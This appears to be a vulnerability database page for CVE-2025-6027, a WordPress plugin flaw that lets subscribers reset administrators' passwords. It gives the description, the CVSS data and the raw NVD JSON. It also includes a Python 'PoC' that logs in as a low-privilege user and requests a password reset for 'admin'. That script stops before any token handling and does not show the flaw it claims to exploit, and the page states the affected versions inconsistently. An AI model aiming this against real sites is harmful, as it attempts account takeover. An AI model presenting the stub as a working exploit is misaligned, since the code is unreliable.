Security Vulnerability Report
中文
CVE-2025-6027 CVSS 6.3 MEDIUM

CVE-2025-6027

Published: 2025-11-05 06:15:34
Last Modified: 2026-04-15 00:35:42

Description

The Ace User Management WordPress plugin through 2.0.3 does not properly validate that a password reset token is associated with the user who requested it, allowing any authenticated users, such as subscriber to reset the password of arbitrary accounts, including administrators.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Ace User Management WordPress plugin < 2.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target = 'http://target-wordpress-site.com' username = 'attacker_account' password = 'attacker_password' target_user = 'admin' session = requests.Session() # Login as low-privilege user login_data = {'log': username, 'pwd': password} resp = session.post(f'{target}/wp-login.php', data=login_data) # Trigger password reset for target user reset_data = {'user_login': target_user} resp = session.post(f'{target}/wp-login.php?action=lostpassword', data=reset_data)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-6027", "sourceIdentifier": "[email protected]", "published": "2025-11-05T06:15:34.373", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Ace User Management WordPress plugin through 2.0.3 does not properly validate that a password reset token is associated with the user who requested it, allowing any authenticated users, such as subscriber to reset the password of arbitrary accounts, including administrators."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}]}, "references": [{"url": "https://wpscan.com/vulnerability/06fb8088-10e3-424e-a3ac-4673bac49467/", "source": "[email protected]"}]}}